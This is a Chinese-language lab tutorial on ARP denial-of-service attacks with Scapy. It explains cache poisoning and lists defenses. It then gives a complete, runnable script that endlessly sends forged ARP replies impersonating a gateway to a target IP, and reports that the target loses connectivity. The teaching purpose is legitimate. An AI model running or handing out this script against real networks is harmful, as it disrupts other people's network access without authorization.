使用 Scapy 库编写 ARP 拒绝服务攻击脚本

简介: 使用 Scapy 库编写 ARP 拒绝服务攻击脚本

一、ARP 协议基础

参考下篇文章学习

二、ARP 拒绝服务攻击原理:

ARP拒绝服务攻击利用ARP协议的工作原理,通过发送大量的伪造ARP请求来混乱目标设备的ARP缓存,使其无法正确地将IP地址解析为MAC地址。攻击者发送大量的ARP请求,每个请求都会伪造一个源IP地址和源MAC地址。目标设备收到这些伪造的请求后,会将伪造的源IP地址和MAC地址存储在ARP缓存中,覆盖掉真实的映射关系。这样,当其他设备需要与目标设备通信时,由于ARP缓存中的映射关系是错误的,通信将无法正常进行,从而导致拒绝服务

2.1 ARP 拒绝服务攻击步骤:

  • 攻击者获取目标设备的IP地址。
  • 攻击者利用程序或工具发送大量伪造的ARP请求,每个请求都包含一个伪造的源IP地址和源MAC地址,以及目标设备的IP地址。
  • 目标设备收到伪造的ARP请求后,将错误的映射关系存储在ARP缓存中。
  • 当其他设备需要与目标设备通信时,会根据ARP缓存中的错误映射关系发送数据包,导致通信失败。

2.2 防御ARP拒绝服务攻击的方法:

  • 使用静态ARP表:在网络中配置静态ARP表,将每个设备的IP地址与MAC地址直接关联,不使用ARP协议进行解析。这样可以防止ARP缓存被攻击者篡改。
  • ARP缓存监控和清除:监控网络中的ARP缓存,及时发现异常的映射关系,并进行清除,恢复正常的映射关系。
  • 使用防火墙:在网络中设置防火墙,限制对ARP请求的频率和数量,阻止大量伪造的ARP请求进入网络。
  • 网络流量监控:通过监控网络流量,及时发现异常的ARP请求,可以采取相应的措施防止攻击的发生。

三、安装 Scapy 库

3.1 Windows

pip install scapy

3.2 Linux

git clone https://github.com/secdev/scapy
cd scapy
./run_scapy 

四、环境准备

我们可以通过Scapy内的ls命令来查看构造一个ARP类时应当具有哪些属性,如图所示:

在Scapy库中,ls(ARP)命令用于显示ARP协议的字段及其默认值。下面是对输出中各字段的解释:

  • hwtype:硬件类型字段,表示硬件地址的类型。默认为XShortEnumField类型,值为1,代表以太网。
  • ptype:协议类型字段,表示协议地址的类型。默认为XShortEnumField类型,值为2048,代表IPv4地址。
  • hwlen:硬件地址长度字段,表示硬件地址的长度。默认为FieldLenField类型,无默认值,根据硬件类型自动设置。
  • plen:协议地址长度字段,表示协议地址的长度。默认为FieldLenField类型,无默认值,根据协议类型自动设置。
  • op:操作码字段,表示ARP报文的操作类型,例如请求(1)或响应(2)。默认为ShortEnumField类型,值为1,代表ARP请求。
  • hwsrc:源硬件地址字段,表示发送ARP请求或响应的设备的硬件地址。默认为MultipleTypeField类型,无默认值。
  • psrc:源协议地址字段,表示发送ARP请求或响应的设备的协议地址(IP地址)。默认为MultipleTypeField类型,无默认值。
  • hwdst:目标硬件地址字段,表示ARP请求或响应的目标设备的硬件地址。默认为MultipleTypeField类型,无默认值。
  • pdst:目标协议地址字段,表示ARP请求或响应的目标设备的协议地址(IP地址)。默认为MultipleTypeField类型,无默认值。

小王:CentOS 9

五、实操演示

#!/usr/bin/python3
from scapy.all import *
from scapy.layers.l2 import Ether, ARP
import random
 
 
def arp_dos(target_ip, gateway_ip):
    print("ARP 拒绝服务攻击中...")
 
    # 创建以太网帧对象
    eth = Ether()
 
    # 设置以太网帧的目标 MAC 地址为广播地址
    eth.dst = "ff:ff:ff:ff:ff:ff"
 
    # 创建ARP对象
    arp = ARP()
 
    # 设置ARP报文的操作码为2,表示ARP响应包
    arp.op = 2
 
    # 设置ARP报文的源MAC地址为随机生成的MAC地址
    arp.hwsrc = random_mac()
 
    # 设置ARP报文的源IP地址为网关IP地址
    arp.psrc = gateway_ip
 
    # 设置ARP报文的目标MAC地址为随机生成的MAC地址
    arp.hwdst = random_mac()
 
    # 设置ARP报文的目标IP地址为目标IP地址
    arp.pdst = target_ip
 
    # 使用Scapy中的/运算符将以太网帧对象eth和ARP对象arp组合成一个数据帧
    frame = eth / arp
 
    # 使用Scapy中的sendp()函数发送构造好的数据帧
    sendp(frame)
 
 
def random_mac():
    # 生成随机的MAC地址
    mac = [random.randint(0x00, 0xff) for _ in range(6)]
    return ":".join(["%02x" % byte for byte in mac])
 
 
target_ip = "192.168.134.132"  # 目标IP地址
gateway_ip = "192.168.134.254"  # 网关IP地址
 
while True:
    arp_dos(target_ip, gateway_ip)

发起攻击

可以发现 IP 地址对应的 MAC 地址一直在变化

Ping 不通符合实验效果


相关文章
|
1月前
|
网络协议 安全 NoSQL
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
|
7月前
|
存储 缓存 监控
使用 Scapy 库编写 ARP 拒绝服务脚本
使用 Scapy 库编写 ARP 拒绝服务脚本
|
7月前
|
缓存 监控 网络协议
使用 Scapy 库编写 ARP 缓存中毒脚本
使用 Scapy 库编写 ARP 缓存中毒脚本
|
网络协议 Python
|
7月前
|
缓存 网络协议 网络架构
【计算机网络】第三章 数据链路层(MAC地址 IP地址 ARP协议)
【计算机网络】第三章 数据链路层(MAC地址 IP地址 ARP协议)
153 1
|
2月前
|
缓存 网络协议 Linux
Python渗透测试之ARP毒化和协议应用
Python渗透测试之ARP毒化和协议应用
36 0
|
4月前
|
网络协议
用户态协议栈04-定时arp-table的实现
用户态协议栈04-定时arp-table的实现
|
4月前
|
缓存 网络协议
用户态协议栈02-arp reply实现
用户态协议栈02-arp reply实现
|
4月前
|
网络协议 安全 网络安全
ARP协议详解及其工作原理
【8月更文挑战第31天】
202 0
|
4月前
|
存储 缓存 监控